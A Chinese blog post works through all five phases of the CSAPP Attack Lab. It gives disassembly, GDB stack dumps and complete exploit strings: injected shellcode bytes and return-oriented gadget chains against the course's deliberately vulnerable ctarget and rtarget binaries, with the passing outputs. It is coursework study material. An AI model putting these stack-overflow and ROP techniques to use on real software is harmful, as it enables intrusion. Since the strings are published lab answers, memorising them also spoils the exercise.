CSAPP实验3:Attack Lab

最新推荐文章于 2026-04-06 17:22:09 发布
原创 最新推荐文章于 2026-04-06 17:22:09 发布 · 9.1k 阅读 · 27 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#csapp
本文详细介绍了CSAPP实验3的内容,包括Code Injection的三个阶段,以及Return-Oriented Programming(ROP)的两个阶段。实验涉及利用gadgets进行攻击,通过修改栈上的返回地址,注入代码来执行特定功能,如传递cookie值给touch1, touch2和touch3函数。实验中使用了objdump, GDB等工具,强调了栈的布局、地址计算和利用ret指令的重要性。" 131743700,19435589,Java-JSP养老院管理系统设计与实现,"['Java', '课程设计', '开发语言', 'SSM框架', '毕设指导']

一、资源概览

网站上下载到压缩包target1,解压后包含如下文件:
- README.txt:文件夹中各个文件的介绍。
- ctarget和rtarget:用于进行攻击的可执行文件
- cookie.txt:一个八位十六进制数,有些攻击会用到。
- farm.c:ROP攻击中用到的“gadget farm”的源码。
- hex2raw:用于生成攻击字符串的工具程序。

二、注意事项

  1. 运行ctarget和rtarget时可以使用以下参数:
    • -q:self-study必选参数,避免程序寻找教师的服务器。
    • -h:列出可能的命令行参数
    • -i FILE:从文件读取输入,而非从标准输入

  2. 使用”./hex2raw”将exploit字符串转换为字节码。使用方法参考attack.pdf的Appendix A。简而言之,输入应该为每两个十六进制数一组,用空格进行分隔。比如十六进制0应该写作00,0xdeadbeef应该写作“ef be ad de”。hex2raw的使用方法如下:

    unix> cat exploit.txt | ./hex2raw | ./ctarget
  3. 本实验可以参考CS:APP3e之3.10.3节和3.10.4节。
  4. 使用ret指令实施攻击,所用的地址应该是下列之一:
    • 函数touch1, touch2或touch3的地址
    • 注入代码的地址
    • 从gadget farm中利用的gadgets地址
  5. 从rtarget文件中构造gadgets的时候,地址应该在start_farm和end_farm之间。

  6. 漏洞存在于getbuf函数:无法得知缓冲区是否能容纳读入的字符串。

    unsigned getbuf()
{
    char buf[BUFFER_SIZE];
    Gets(buf);
    return 1;
}

三、Part I: Code Injection Attacks

  • 攻击目标:ctarget
  • ctarget运行时,栈上位置是连续的,所以栈上的数据是可执行的。

Phase 1

  1. 任务:使ctarget从getbuf返回时,执行touch1的代码,而不是返回到test中继续执行。

  2. 建议:

    • 所需信息仅需要反汇编代码。可以用objdump -d
    • 注意字节顺序
    • 使用GDB,在getbuf的最后几步单步调试,确认情况
    • buf在栈帧中的位置取决于编译时的常量BUFFER_SIZE,以及GCC使用的分配策略。需要根据反汇编代码确定buf的位置。

  3. 查看getbuf

    gdb-peda$ disas getbuf
Dump of assembler code for function getbuf:
=> 0x00000000004017a8 <+0>:     sub    rsp,0x28
0x00000000004017ac <+4>:        mov    rdi,rsp
0x00000000004017af <+7>:        call   0x401a40 <Gets>
0x00000000004017b4 <+12>:       mov    eax,0x1
0x00000000004017b9 <+17>:       add    rsp,0x28
0x00000000004017bd <+21>:       ret    
End of assembler dump.

  4. 很容易发现buf的缓冲区大小为0x28,所以填充了40个双字之后,写入的地址就可以覆盖返回地址ret了。记得要把地址后面的0补足了。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
c0 17 40 00 00 00 00 00
  5. Phase 1可以通过了。

    cd@ubuntu:~/pwn/csapp/attackLab$ cat exploit-1.txt | ./hex2raw | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch1!: You called touch1()
    Valid solution for level 1 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:1:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA C0 17 40 00 00 00 00 00

Phase 2

  1. 任务:使ctarget从getbuf返回时,执行touch2的代码,而不是返回到test中继续执行。并且要将cookie作为参数传递给touch2。

  2. touch2的代码如下:

    void touch2(unsigned val)
{
    vlevel = 2;             /* Part of validation protocol */
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}

  3. 建议:

    • 传递给函数的第一个参数保存在%rdi中。
    • 注入代码应该把寄存器的值设成cookie,然后使用ret指令跳转到touch2。
    • 总是使用ret指令来执行程序的控制转移。

  4. 思考:

    • 注入代码的工作流程如上面的建议所示,首先要把%rdi的值设置为cookie的值,然后使用ret指令跳转到touch2。问题是,第二步怎么才能做到?
    • ret指令的作用:从栈上弹出地址A,然后把PC设置为A。通常书上讲的是call和ret如何配合使用。这里则可以单独利用ret的功能,把touch2的地址压入栈,使其位于栈顶,然后ret指令就会把控制转移到touch2。

  5. exploit-2

    注意!返回地址要用00前缀补齐位数;压入栈的地址要有**一个**00前缀,多余的00会被混入下一条指令,没有00的话下一条指令会被认作地址(gcc会处理好,不要自己乱加或者乱删)。

    48 c7 c7 fa 97 b9 59        /* mov    $0x59b997fa,%rdi */
68 ec 17 40 00              /* pushq  $0x4017ec        */
c3                          /* retq                    */
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00     /* old %rsp                */
  6. Phase 2通过。

    cd@ubuntu:~/pwn/csapp/attackLab$ ./hex2raw < exploit-2.txt | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

Phase 3

  1. 任务:Phase 3也需要把Cookie作为参数,传递给touch3。但是需要传递cookie的字符串形式。

  2. touch3的代码:

    /* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
    char cbuf[110];
    /* Make position of check string unpredictable */
    char *s = cbuf + random() % 100;
    sprintf(s, "%.8x", val);
    /* cookie is trasfered from unsigned to string */
    return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval)
{
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3);
    }
    exit(0);
}
  3. 建议:
    • 需要把cookie转换为字符串表示形式。8位十六进制的cookie -> 8个十六进制表示的数字。(man ascii)
    • 注意,字符串要用字节0作为结尾!
    • 注入代码应该把%rdi设置为字符串的地址
    • 在调用hexmatch和strncmp的时候,将会把数据压入堆栈,所以会覆盖getbuf使用的缓冲区中的部分内存。所以,谨慎选择放置cookie的位置。

  4. 思考:

    要把cookie字符串作为参数,传递给touch3。那么需要在栈里找一个位置来保存cookie字符串。修改Phase 2的exploit,先把cookie放在0x5561dca8的位置。

    48 c7 c7 88 dc 61 55            /* mov    $0x5561dca8,%rdi */
68 fa 18 40 00                  /* pushq  $0x4018fa        */
c3                              /* retq                    */
00 00 00
35 39 62 39 39 37 66 61         /* $0x59b997fa, cookie     */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00         /* %rsp                    */

    在touch3的<+17>与<+28>处下断点,比较调用hexmatch前后,栈上内存的变化情况。

    gdb-peda$ disas touch3
Dump of assembler code for function touch3:
   0x00000000004018fa <+0>:     push   rbx
   0x00000000004018fb <+1>:     mov    rbx,rdi
   0x00000000004018fe <+4>:     mov    DWORD PTR [rip+0x202bd4],0x3        # 0x6044dc <vlevel>
   0x0000000000401908 <+14>:    mov    rsi,rdi
   0x000000000040190b <+17>:    mov    edi,DWORD PTR [rip+0x202bd3]        # 0x6044e4 <cookie>
   0x0000000000401911 <+23>:    call   0x40184c <hexmatch>
   0x0000000000401916 <+28>:    test   eax,eax
   0x0000000000401918 <+30>:    je     0x40193d <touch3+67>
   0x000000000040191a <+32>:    mov    rdx,rbx
   ......
End of assembler dump.

    <+17>处的栈上内存,其中0x5561dc78 ~ 0x5561dc9f为缓冲区,大小为40个字节。可以看到0x5561dca0的内存已经不是exploit写入的内容了,因为touch3有push rbx的操作。

    gdb-peda$ x /56b 0x5561dc78
0x5561dc78: 0x48    0xc7    0xc7    0x88    0xdc    0x61    0x55    0x68
0x5561dc80: 0xfa    0x18    0x40    0x00    0xc3    0x00    0x00    0x00
0x5561dc88: 0x35    0x39    0x62    0x39    0x39    0x37    0x66    0x61
0x5561dc90: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dc98: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dca0: 0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
0x5561dca8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

    <+28>处的栈上内存,其中0x5561dc78 ~ 0x5561dca0为缓冲区。此时原缓冲区的内容基本已经不同于exploit写入的内容。

    gdb-peda$ x /56b 0x5561dc78
0x5561dc78: 0x00    0xcc    0xb4    0x4a    0x28    0xa7    0xa4    0xb5
0x5561dc80: 0x88    0xdc    0x61    0x55    0x00    0x00    0x00    0x00
0x5561dc88: 0xe8    0x5f    0x68    0x55    0x00    0x00    0x00    0x00
0x5561dc90: 0x02    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dc98: 0x16    0x19    0x40    0x00    0x00    0x00    0x00    0x00
0x5561dca0: 0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
0x5561dca8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

    分析一下,因为调用hexmatch,sprintf和strncmp多次压栈,而且写入cookie的栈上地址是随机的,因此传入的字符串不能保存在getbuf函数的缓冲区。可行的方式是把字符串保存在getbuf的父进程的栈中。如exploit-3所示。

  5. exploit-3

    48 c7 c7 a8 dc 61 55            /* mov    $0x5561dca8,%rdi */
68 fa 18 40 00                  /* pushq  $0x4018fa        */
c3                              /* retq                    */
00 00 00
FA 97 B9 59 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00         /* %rsp                */
35 39 62 39 39 37 66 61 00      /* cookie, at $0x5561dca8 */
  6. Phase 3成功通过。
    sh
    gdb-peda$ c
    Continuing.
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 FA 97 B9 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00

四、Part II: Return-Oriented Programming

简单来说,Part II和Phase 2以及Phase 3是相同的攻击目标,但是需要使用ROP攻击。每个gadget可以实现一个小步骤,完成对寄存器的操作,然后ret,接着执行下一个gadget。一系列被执行的gadgets形成了链条,最终达到我们的目的。

readme.pdf给出了Byte encodings of instructions,做题时按图索骥,在gadgets farm中寻找有没有匹配的gadget。

  • rtarget使用了两种技术防止代码注入攻击:

    1. 栈地址随机化
    2. 栈不可执行

  • 攻击方式:执行已有的代码,而不是注入新的代码。最常见的是ROP。

    1. ROP可以形成一个gadgets的链条,通过每个gadget末尾的ret指令,程序可以跳转到下一个gadget的开头。
    2. rtarget中的gadgets farm由start_farm和end_farm划定,请勿尝试从程序的其他部分构建gadgets。

  • 允许使用以下指令:

    • movq
    • popq
    • ret
    • nop
  • 建议:
    • 划定区域:从start_farm到mid_farm
    • 该攻击可以仅使用两个gadgets
    • 当一个gadget使用popq指令时,会从栈上pop数据。因此,exploit字符串应该包含gadget地址和data。

Phase 4

  1. 思考:
    首先要把cookie传入%rdi,然后再转入到touch2函数。

    根据readme.pdf的命令列表,在gadets farm中没有发现popq %rdi。于是可以先popq %rax,然后movq %rax, %rdi

  2. exploit-4
    这里的缓冲区完全被junk填充,然后从getbuf的ret向下执行。用到了两个gadget,所用到的data也放在了栈上。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
cc 19 40 00 00 00 00 00     /* jump 0x4019cc; popq %rax         */
fa 97 b9 59 00 00 00 00     /* cookie                           */
c5 19 40 00 00 00 00 00     /* jump 0x4019c5; movq %rax, %rdi   */
ec 17 40 00 00 00 00 00     /* touch2                           */

  3. 通过Phase 4

    gdb-peda$ r -q < ./exploit-4-raw.txt 
Starting program: /mnt/hgfs/pwn/csapp/attackLab/rtarget -q < ./exploit-4-raw.txt
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:rtarget:2:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Phase 5

  1. 思考:

    同Phase 5一样,这里也需要考虑如何存放cookie字符串,并且多了一个传递字符串地址到%rdi的难题。

    首先,getbuf的缓冲区应该全部填充为junk,那么cookie字符串为了不干扰exploit的正常运行,必然要放在exploit的最后。

    第二个问题,一开始在gadgets farm找到许多如下的操作:

    mov    $0x909078fb,%eax
lea    -0x3c3876b8(%rdi),%eax
movl   $0xc7c78948,(%rdi)
......

    所以考虑过能否使用这些数值来拼凑一个地址,然后把cookie字符串放在那里。但是由于有栈随机化,所以这个思路不行。

    后来看了一些解答,发现居然有movq %rsp, %rax这样的神操作,那样就可以用(%rsp) + x的方式来得到cookie字符串的地址了。然后就是一通拼拼凑凑,用了8个gadgets完成了exploit。

  2. exploit-5
    关于这种需要很多gadgets才能完成的exploit,觉得思路肯定是最重要的,但是思路明晰之后,在组成gadgets的链条时,不妨用倒序查找的方法,也许会快一些。当然,今后肯定会使用一些查找gadgets的工具啦。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
06 1a 40 00 00 00 00 00     /* jump 0x401a06               ;movq %rsp, %rax */
c5 19 40 00 00 00 00 00     /* jump 0x4019c5               ;movq %rax, %rdi */
ab 19 40 00 00 00 00 00     /* jump 0x4019ab               ;popq %rax       */
48 00 00 00 00 00 00 00     /* distance from here to cookie string          */
dd 19 40 00 00 00 00 00     /* jump 0x4019dd               ;movl %eax, %edx */
34 1a 40 00 00 00 00 00     /* jump 0x401a34               ;movl %edx, %ecx */
13 1a 40 00 00 00 00 00     /* jump 0x401a13               ;movl %ecx, %esi */
d6 19 40 00 00 00 00 00     /* jump 0x4019d6        ;lea (%rdi,%rsi,1),%rax */
c5 19 40 00 00 00 00 00     /* jump 0x4019c5               ;movq %rax, %rdi */
fa 18 40 00 00 00 00 00     /* touch3                                       */
35 39 62 39 39 37 66 61     /* cookie string                                */
00 00 00 00 00 00 00 00     /* string ends with 00                          */
  3. 通过Phase 5

    gdb-peda$
    Continuing.
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target rtarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:rtarget:3:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA 06 1A 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

五、参考资料

  1. CS:APP配套实验3:Attack Lab笔记
  2. 【不周山之读厚 CSAPP】III Attack Lab
  3. Beej的GDB快速指南
AttackLab实验-计算机系统基础-gddrxy
03-30
实验原理与内容 “AttackLab”是一个Linux下的可执行C程序,包含了5个阶段(phase1~phase5)的不同内容。程序运行过程中,要求学生能够根据缓冲区的工作方式和程序的反汇编代码来确定攻击字符串长度和字符串中的关键内容。每次成功实现缓冲区溢出攻击时都会有提示相应内容,如果攻击失败则单纯的提示segmentation fault相关信息。 要求攻击字符串的执行不许绕开代码中的validate函数,缓冲区溢出之后对应ret的返回地址可以是以下类型: 1.函数touch1、touch2、touch3的首地址; 2.自行注入的攻击的首地址; 3.在后两个阶段中(ROP攻击),与farm.c的对应的可利用的gadget的起始地址,farm.c对应的机器码已经包含在可执行文件中。可以使用的gadget首地址需处于start_farm和end_farm之间的部分。 注意:前三个阶段使用ctarget作为攻击目标文件,后两个阶段中使用rtarget作为攻击目标文件。 每个阶段考察一个缓冲区溢出方式,难度逐级递增:  阶段1:使用非ROP方式对ctarget进行攻击,调用touc
CSAPP实验——AttackLab
C__C_的博客
12-19 1万+
Attack Lab 缓冲区溢出攻击实验 本次实验涉及对两个具有不同安全漏洞的程序进行五次攻击,攻击方式分为两种Code injection代码注入和Reeturn-oriented programming(ROP)面向返回编程。 1、深入理解当程序没有对缓冲区溢出做足够防范时,攻击者可以利用安全漏洞的方法。 2、更好地了解如何编写更安全的程序,以及编译器和操作系统提供一些帮助,以减少程序的易受攻击性。 3、深入了解x86-64机器代码的堆栈和参数传递机制。 4、深入了解x86-64指令的编码方式。
深入理解计算机系统AttackLab实验
AL.千灯学长的博客
03-21 8939
深入理解计算机系统AttackLab实验,函数中的Gets函数与标准库中的gets函数类似,它从standard input中读取字符(以\n或者EOF结尾)并将它们添加字符串结尾符\0后存入缓冲区中。学生需要根据ctarget和rtarget文件及其反汇编代码来确定缓冲区位置及大小,并想办法构建出攻击字符串。
CSAPP 缓冲区溢出实验
poptar的博客
06-06 2270
实验5 缓冲区溢出实验 一、实验目的 1、深入了解缓冲区溢出的隐患,了解如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持、执行非法程序代码,从而造成对程序进行攻击以及破坏的过程; 2、增强对程序机器级表示、汇编语言、调试器和逆向工程等理解。 二、实验内容 对目标程序实施缓冲区溢出攻击,通过造成缓冲区溢出来破坏目标程序的栈帧结构,继而...
CSAPP】【attacklab实验Attack lab 实战:从缓冲区溢出到ROP攻击
weixin_29001419的博客
03-26 307
本文详细解析了CSAPP Attack Lab实验三,从缓冲区溢出攻击到ROP攻击的实战技巧。通过五个渐进式phase,读者将掌握修改返回地址、注入机器指令、字符串参数传递等核心技术,并学习如何应对ASLR和NX防护。实验不仅演示了攻击方法,更强调了现代系统安全防护机制的重要性。
CSAPP--ATTACKLAB实验
qq_53336526的博客
12-08 1万+
武汉大学csapp实验attacklab
告别枯燥理论:用CSAPP Attack Lab实战,5分钟搞懂缓冲区溢出与ROP链构造原理
weixin_30296405的博客
03-29 396
本文通过CSAPP Attack Lab实战,详细解析缓冲区溢出与ROP链构造原理。从代码注入到面向返回编程(ROP),逐步演示如何利用漏洞劫持程序控制流,并绕过现代防护机制如ASLR和NX。适合计算机安全学习者通过实践深入理解系统漏洞与防御技术。
CSAPP实验(2-2)---Attack Lab
最新发布
2401_83357597的博客
04-06 374
摘要 本文详细介绍了CSAPP缓冲区溢出攻击实验Attack Lab)的解题过程。实验分为CTarget和RTarget两部分,分别演示代码注入攻击和面向返回编程(ROP)攻击技术。在CTarget部分,通过构造特定输入覆盖返回地址,逐步完成touch1、touch2和touch3三个关卡:touch1直接跳转目标函数;touch2需要传递cookie值作为参数;touch3则需传递cookie字符串。RTarget部分则利用现有代码片段(gadget)构造ROP链实现攻击。文章详细说明了每关的解题思路、
CSAPP 3e Attack lab
热门推荐
lijun538的专栏
02-17 4万+
总结一下CSAPP第三版的attack lab
CSAPPAttack Lab —— 缓冲区溢出攻击实验
-Silvia、
06-05 4万+
CSAPPAttack Lab —— 缓冲区溢出攻击实验 X86-64寄存器和栈帧 Part I:Code Injection Attacks Part II:Return-Oriented Programming Attacks
CSAPP Lab3Attack Lab
倪多多的博客
05-16 1万+
实验是《深入理解计算机系统》(英文缩写CSAPP)课程附带实验——Lab3Attack Lab,和Lab 2:Bomb Lab都对应书中第三章内容(程序的机器级表示),该实验分为代码注入或面向返回的编程两部分,进行缓冲区溢出攻击。
CSAPP-Lab03 Attack Lab 详细解析
qq_25591221的博客
03-05 1万+
目录实验概览Part 1: Code Injection AttacksPhase 1分析反汇编`test`反汇编`getbuf`SolutionPhase 2分析注入代码栈帧讲解SolutionPhase 3分析注入代码栈帧讲解SolutionPart 2: Return-Oriented ProgrammingPhase 4分析栈帧讲解SolutionPhase 5分析栈帧讲解Solution总结 纸上得来终觉浅,绝知此事要躬行 实验概览 Attack!,成为一名黑客不正是我小时候的梦想吗?这个实验
CSAPP Lab3 实验记录 ---- Attack Lab(Ctarget)
Love 6's Private Blog
02-23 4839
前引 前段时间才把Bomb Lab做完 然后就认为第三章是没有Lab可以做了 之后在到现在的一段时间 人是比较懒的 玩游戏玩疯了 作息也比较不规律qwq 每天1-2点睡觉 早晨10-11点起床 早饭不吃 午饭晚饭点外卖 捏???? 反正我是真麻了 尽管说人是需要休息 毕竟寒假期间 春节也才刚刚过完 但是是不是也不能那么颓靡 至少人总有一个时间是会回顾之前经过的那么多天 还是要做点正事的 同样这个Lab也是之后我在玩的时候 翻博客 想一下CSAPP后面还有什么Lab需要做的时候 我看了看结果发现第四章真的要花
CSAPP Attack Lab 实验记录 [yy-b]
weixin_43968560的博客
02-26 1626
文章目录前言实验环境实验内容准备阶段阶段1阶段2阶段3阶段4阶段5END 前言 写这个的目的就是想记录一下自己做过的东西,内容可能比较简单,不喜请略过. 写的比较详细,按步骤大概率可重复实验. 本次的内容是CSAPP上的实验Attack Lab. 实验环境 MobaXterm Linux系统 Objdump命令反汇编 GDB调试工具 实验内容 准备阶段 (实验所需材料略) 先读一遍实验介绍文...
CSAPP实验记录(三):Attack lab
qq_45698833的博客
07-25 2509
CSAPP实验记录(三):Attack lab 这个lab涉及到对分别有不同安全漏洞的两个程序进行总共5次攻击。从这个lab中我们将了解到当程序不能很好地保护自己免受缓冲区溢出时,攻击者可以利用安全漏洞的不同方式。我们将学习到如何写出更安全的程序、如何使用GDB和OBJDUMP等工具。 objdump是在类Unix操作系统上显示关于目标文件的各种信息的命令行程序。我们可以使用objdump命令对目标文件(obj)或可执行文件进行反汇编,它以一种可阅读的格式让你更多的了解二进制文件可能带有的附加信息。 从官网
CSAPP Lab3——Attack Lab 解析
weixin_54041856的博客
01-19 1796
CSAPP Attack Lab 解析
CSAPP Lab03——Attack Lab
John_Snowww的博客
06-04 1298
这次的要求看上去和touch2差不多,不过它要求的是传递指向cookie的指针到touch3里面。所以这个lab需要完成的就是两大点:把cookie的地址赋给edi传给touch3,注意这个地址不能放在getbuf开辟的缓冲区里,否则可能被hexmatch和strncmp覆盖。 跳转到存放汇编代码的首地址 跳转到touch3
[CSAPP]Attack Lab实验笔记
康宇的博客
06-06 1061
attacklab这节玩的是利用一个字符串进行缓冲区溢出漏洞攻击,就小时候想象中黑客干的事儿. 做题的时候好几次感叹这些人的脑洞,"这都可以攻击?还能这么注入?这还可能借力打力?"等自己注入的时候却是"啊?怎么又段错误了?怎么又算错地址了?"也是一次有趣的经历了. 小插曲:我拿到文件的时候直接去读得readme,看完了还迷惑这readme咋就这么点信息.后来知道了实验都要配合着writeup讲义看,不禁感叹我前两个实验没看讲义还能做出来真是个奇迹! ### level1 第一步先反汇编拿到ctarget的
深入理解计算机系统(CSAPPattack-lab详解
独小雪的博客
07-30 2634
深入理解计算机系统(CSAPPattack-lab详解 下载实验用的程序戳这里 戳这里下载实验说明 开始 target1里的两个程序,ctraget和rtarget,都有缓冲区溢出的bug。实验要求我们做的,是利用这些bug,让程序通过缓冲区溢出,执行我们想执行的代码。下载的文件夹里,ctarget是做代码注入攻击 (code-injection attacks) 用的。rtarget,还有后面的cookie.txt、hex2raw、farm.c都和后面的ROP攻击(return-oriented-pr
CSAPP】【attacklab实验Attack lab 详解
weixin_72899100的博客
12-04 4406
CSAPP】【attacklab实验Attack lab 详解 5个阶段 5 PASS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值